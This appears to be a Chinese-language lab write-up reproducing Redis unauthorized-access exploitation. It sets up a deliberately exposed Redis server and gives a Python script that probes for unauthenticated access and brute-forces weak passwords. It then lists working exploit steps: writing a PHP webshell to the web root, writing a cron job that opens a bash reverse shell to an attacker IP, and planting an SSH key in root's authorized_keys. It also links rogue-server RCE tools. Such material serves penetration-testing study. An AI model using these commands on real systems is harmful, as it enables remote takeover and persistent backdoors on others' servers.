redis未授权访问复现

redis未授权访问

1.环境搭建

wget http://download.redis.io/releases/redis-3.2.11.tar.gz

tar zxvf redis-3.2.11.tar.gz

cd redis-3.2.11

make

如果缺少make的话 apt install make

//上面的当我没说，我环境不允许，正在尝试centos

2.环境搭建(1)

wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
vim redis.conf
bind 127.0.0.1前面加上#号 protected-mode设为no
./src/redis-server redis.conf
firewall-cmd --zone=public --remove-port=6379/tcp --permanent
firewall-cmd --reload

3.漏洞检测

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授权访问"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令，密码：%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

4.漏洞利用

4.1写webshell

redis-cli -h 192.168.164.147
config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save

4.2反弹shell

nc -lvnp 7999
set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

4.3写ssh公钥

再kali上生成ssh公钥

ssh-keygen -t rsa
cat id_rsa.pub
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/AxH3PNJW2moAmp5rZn4rRpel0BNFNJx3un6aQHAp8MqyL25kC2ugDqjTYOxtAqM9MLySG4UJUn6g6aSZQqv36zh9nBxprIwMUTorxQBnwGjgkTkOVHF241nGnCRGKPMPxGfdAkj/CFd6Esk7jyzqafF6lhzy4tLh2jk2P50qhnMQei7IZigEQOW36oBSAcBD+yZ0tQekozyzg7JJ+8v2XkuCcEvI2K6gSX/29A3BkTXUS/0c4yLw6r5UVDyhcdZDc6qbeqeTyKDeMxCgwqRZV9SZOyorQtya+UUW5AifnEUREYpK4CBlpzs1ek6eE6vgRAZGoJ8BnpkvfDayku5rgqNBbjuIxfq1+nEZInD9JVLjk4hC6ZJk1pypXD2+gxQZeBL9OYOmFx3Onx5A2sqPxh/jDrfiF8s5x3wgcTUQ4BulBWp+qUuj0KjXMN/cOuaa7t2Ame3o3MIaa4axw3OEyaIzlY9V0GRYZlHUkoy5ljF5BUUoFWrm9Gf10jqDnnU= root@kali\n\n\n"
save
ssh -i id_rsa [email protected]

4.4脚本利用

https://github.com/n0b0dyCN/redis-rogue-server

https://github.com/Ridter/redis-rce

5.参考文章

https://www.cnblogs.com/bmjoker/p/9548962.html

https://www.freebuf.com/vuls/223432.html

https://blog.csdn.net/fly_hps/article/details/80937837